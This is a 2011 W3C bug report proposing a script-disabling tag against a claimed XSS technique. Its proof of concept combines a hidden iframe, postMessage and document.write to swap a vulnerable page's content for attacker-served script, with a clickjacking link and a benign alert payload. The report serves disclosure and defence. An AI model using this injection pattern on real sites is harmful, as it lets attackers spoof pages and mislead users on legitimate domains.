[Bug 12469] New: Dynamic Cross-Site Scripting and Page Repainting

http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

           Summary: Dynamic Cross-Site Scripting and Page Repainting
           Product: HTML WG
           Version: unspecified
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: HTML5 spec (editor: Ian Hickson)
        AssignedTo: ian@hixie.ch
        ReportedBy: simon.young90@live.com
         QAContact: public-html-bugzilla@w3.org
                CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
                    public-html@w3.org


It has come to my attention in my studies that the addition of cross-document
messaging in HTML5 allows a new, dynamic form of cross-site scripting to be
developed, employing legitimate communications between injected content. By
accompanying this with the document.wrtie() function, this could then be used
to dynamically control “repaint” the entire content of a webpage vulnerable to
code injection. A website could then be completely simulated by the XSS attack
while still residing on a legitimate domain, a man-in-the-middle blue-pill esk
attack.

In this example, dynamically served code is appended to the original page,
removing document.getElementsByTagName('html')[0].innerHTML will allow the page
to be completely changed:

>>>>>Injected Code:

<iframe id="mommy" src="URL" style="visibility:hidden; height:0;
width:0"></iframe>
<script>
    window.addEventListener ("message", recvPayload, false);

    function recvPayload (event) {
        document.write(document.getElementsByTagName('html')[0].innerHTML +
unescape(event.data));
    }

    function requestPayload () {
        var frame = document.getElementById ("mommy");
        frame.contentWindow.postMessage ("baby wants milk!", "*");
    }
</script>
<a href="" onClick="requestPayload ()"> <!-- clickjacking -->

>>>>Server Page:

<script>
    window.addEventListener ("message", sendPayload, false);

    payload = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D"+
                 "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E");

    function sendPayload (event) {
        event.source.postMessage (payload, event.origin);
    }
</script>

I propose the addition of a tag which, disables any script within its bounds
perhaps along the lines of.. <plaintext></plaintext> this would allow web
developers to disable areas of a page from using script, blocking XSS attacks.

I would appreciate your thoughts on this.

Many Thanks,
Simon Young

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.

Received on Monday, 11 April 2011 10:02:44 UTC